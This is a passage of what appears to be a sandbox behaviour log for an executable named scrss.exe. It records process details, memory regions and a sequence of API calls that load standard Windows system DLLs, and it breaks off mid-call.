# Flog Txt Version 1 # Analyzer Version: 4.5.0 # Analyzer Build Date: Apr 22 2022 21:04:16 # Log Creation Date: 05.05.2022 08:55:30.819 Process: id = "1" image_name = "scrss.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\scrss.exe" page_root = "0x19588000" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x748" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 121 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 122 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 123 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 124 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 125 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 126 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 127 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 128 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 129 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 130 start_va = 0x400000 end_va = 0x43bfff monitored = 1 entry_point = 0x4034f7 region_type = mapped_file name = "scrss.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\scrss.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\scrss.exe") Region: id = 131 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 132 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 133 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 134 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 135 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 136 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 275 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 276 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 277 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 278 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 280 start_va = 0x490000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 281 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 282 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 283 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 284 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 285 start_va = 0x490000 end_va = 0x54dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 286 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 287 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 288 start_va = 0x76b70000 end_va = 0x76beafff monitored = 0 entry_point = 0x76b8e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 289 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 290 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 291 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 292 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 293 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 294 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 295 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 296 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 297 start_va = 0x741b0000 end_va = 0x755aefff monitored = 0 entry_point = 0x7436b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 298 start_va = 0x75940000 end_va = 0x75976fff monitored = 0 entry_point = 0x75943b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 299 start_va = 0x75f10000 end_va = 0x76408fff monitored = 0 entry_point = 0x76117610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 300 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 301 start_va = 0x76ed0000 end_va = 0x76f14fff monitored = 0 entry_point = 0x76eede90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 302 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 303 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 304 start_va = 0x755d0000 end_va = 0x755dbfff monitored = 0 entry_point = 0x755d3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 305 start_va = 0x76cf0000 end_va = 0x76d7cfff monitored = 0 entry_point = 0x76d39b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 306 start_va = 0x766e0000 end_va = 0x76723fff monitored = 0 entry_point = 0x766e7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 307 start_va = 0x77450000 end_va = 0x7745efff monitored = 0 entry_point = 0x77452e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 308 start_va = 0x767c0000 end_va = 0x768aafff monitored = 0 entry_point = 0x767fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 309 start_va = 0x6c650000 end_va = 0x6c6e1fff monitored = 0 entry_point = 0x6c65dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 310 start_va = 0x7f0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 311 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 312 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 313 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 314 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 315 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 316 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 317 start_va = 0xc20000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 318 start_va = 0x550000 end_va = 0x5e0fff monitored = 0 entry_point = 0x588cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 319 start_va = 0x7f0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 320 start_va = 0x8f0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 321 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 322 start_va = 0x550000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 323 start_va = 0x70220000 end_va = 0x70238fff monitored = 0 entry_point = 0x702247e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 324 start_va = 0x75980000 end_va = 0x75d8afff monitored = 0 entry_point = 0x759aadf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 325 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 326 start_va = 0x72120000 end_va = 0x7226afff monitored = 0 entry_point = 0x72181660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 327 start_va = 0x76bf0000 end_va = 0x76c81fff monitored = 0 entry_point = 0x76c28cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 328 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 329 start_va = 0x6e9d0000 end_va = 0x6ea23fff monitored = 0 entry_point = 0x6e9edc50 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 330 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 331 start_va = 0x76730000 end_va = 0x767b3fff monitored = 0 entry_point = 0x76756220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 332 start_va = 0x701d0000 end_va = 0x701f7fff monitored = 0 entry_point = 0x701d7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 333 start_va = 0x6e9c0000 end_va = 0x6e9c7fff monitored = 0 entry_point = 0x6e9c17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 334 start_va = 0x6c760000 end_va = 0x6c765fff monitored = 0 entry_point = 0x6c761570 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 335 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 336 start_va = 0x2020000 end_va = 0x2356fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 337 start_va = 0x550000 end_va = 0x553fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 338 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 339 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 340 start_va = 0x2360000 end_va = 0x245ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 341 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 342 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 343 start_va = 0x5d0000 end_va = 0x5d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 344 start_va = 0x7f0000 end_va = 0x806fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 345 start_va = 0x8a0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 346 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 347 start_va = 0x2460000 end_va = 0x2c63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 348 start_va = 0x810000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 349 start_va = 0x2c70000 end_va = 0x2d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 350 start_va = 0x6b950000 end_va = 0x6b9d0fff monitored = 0 entry_point = 0x6b956310 region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 351 start_va = 0x6c740000 end_va = 0x6c755fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 352 start_va = 0x6c700000 end_va = 0x6c730fff monitored = 0 entry_point = 0x6c7122d0 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 353 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 354 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 355 start_va = 0x2d70000 end_va = 0x2e2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d70000" filename = "" Region: id = 356 start_va = 0x5d0000 end_va = 0x5d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 357 start_va = 0x850000 end_va = 0x851fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 358 start_va = 0x860000 end_va = 0x860fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 359 start_va = 0x870000 end_va = 0x874fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 360 start_va = 0x2460000 end_va = 0x2c65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 361 start_va = 0x2460000 end_va = 0x2c6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 362 start_va = 0x2460000 end_va = 0x2c65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 363 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 1 os_tid = 0xff4 [0088.336] SetErrorMode (uMode=0x8001) returned 0x0 [0088.353] GetVersionExW (in: lpVersionInformation=0x19fe40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fe40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0088.353] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76410000 [0088.354] GetProcAddress (hModule=0x76410000, lpProcName="SetDefaultDllDirectories") returned 0x773a6270 [0088.354] SetDefaultDllDirectories (DirectoryFlags=0xc00) returned 1 [0088.354] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0088.354] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0088.362] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x70240000 [0088.947] lstrlenA (lpString="UXTHEME") returned 7 [0088.947] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0088.947] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\USERENV.dll") returned 12 [0088.947] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x70220000 [0089.174] lstrlenA (lpString="USERENV") returned 7 [0089.174] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0089.174] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0089.174] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x75980000 [0089.832] lstrlenA (lpString="SETUPAPI") returned 8 [0089.832] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0089.832] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\APPHELP.dll") returned 12 [0089.832] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x740e0000 [0090.181] lstrlenA (lpString="APPHELP") returned 7 [0090.181] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0090.181] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0090.181] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x72120000 [0090.698] lstrlenA (lpString="PROPSYS") returned 7 [0090.698] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0090.698] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0090.698] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x6fb20000 [0090.948] lstrlenA (lpString="DWMAPI") returned 6 [0090.948] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0090.948] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0090.948] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x74180000 [0090.948] lstrlenA (lpString="CRYPTBASE") returned 9 [0090.948] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0090.948] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\OLEACC.dll") returned 11 [0090.948] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x6e9d0000 [0091.650] lstrlenA (lpString="OLEACC") returned 6 [0091.650] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0091.650] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0091.650] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x76730000 [0092.087] lstrlenA (lpString="CLBCATQ") returned 7 [0092.087] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0092.088] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\NTMARTA.dll") returned 12 [0092.088] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\NTMARTA.dll", hFile=0x0, dwFlags=0x8) returned 0x701d0000 [0092.394] lstrlenA (lpString="NTMARTA") returned 7 [0092.394] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0092.394] GetSystemDirectoryW (in: lpBuffer=0x19f928, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0092.394] wsprintfW (in: param_1=0x19f94e, param_2="%s%S.dll" | out: param_1="\\VERSION.dll") returned 12 [0092.394] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x6e9c0000 [0092.538] GetProcAddress (hModule=0x6e9c0000, lpProcName="GetFileVersionInfoW") returned 0x6e9c1570 [0092.538] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0092.538] GetSystemDirectoryW (in: lpBuffer=0x19f928, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0092.538] wsprintfW (in: param_1=0x19f94e, param_2="%s%S.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0092.538] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, 